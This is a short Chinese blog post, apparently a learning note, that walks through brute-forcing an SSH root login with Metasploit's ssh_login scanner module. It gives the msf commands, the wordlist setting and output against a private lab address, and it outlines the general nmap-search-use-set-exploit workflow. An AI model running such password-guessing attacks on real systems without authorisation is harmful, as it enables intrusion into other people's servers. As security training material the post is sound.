SEC标签里都会说一些网络完全相关的,光说理论也不好,光将工具太肤浅,不做脚本小子,有一句话说的好,我们都知道最酷的是什么?酷的不是“h4ck3r”这两个字,而是技术。
OK,~let's go!!
哇卡卡,祭出神器metasploit,有多神?其实我也用的不熟,网上竟整些ms10xxx的漏洞,让你去实验,你还得装个xp sp2,这年头还有哪些机器让你去ms10xxxx,今儿就试试百试百灵,也可能百试不灵,暴力破解,表里破解表示我就是正常登入!!!如果服务器没有做好访问频率控制,很有可能就被跑出来了(这年头谁没有个社工库啊)。。。。
ssh字典破解登入
msf> find ssh
找到auxiliary/scanner/ssh/ssh_login...没错就是你了
msf> use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options
主要就几个配置,得来个用户名吧,set USERNAME root,得来个字典文件吧,set PASS_FILE /home/liet/dict/sqlmap/wordlist.txt,就凑个用sqlmap的字典吧,里面都是常用密码的字典排序。balabala配置完之后。。
然后敲下exploit....。。。
192.168.2.247:22 SSH - Starting bruteforce
。。。。。。。。我这个是10 threads,好久好久之后,其实我早知道密码是123456.。。。。。。。。
这里自做一个大概的步骤的介绍,就是先
db_nmap,端口!端口!端口!
->我们就知道开了什么服务,然后在msf里search xxx
->use xxx
->show options
->set xxx xxx
->exploit
当然对于一些特定的你可以结合payload,set等等,msf是框架,框架的意思就是可拓展型很好,你心情好的时候你也可以写一些插件,造福子孙后代。。。今天就先将msf的暴力破解模块,以后还会结合其他的,其实这些东西就跟屎一样被人淘了一遍又一遍,于是今天我又淘了一遍,就算是给自己加深点印象把,做点积累,我们最终的目标是/*没有蛀牙*/做创新的东西。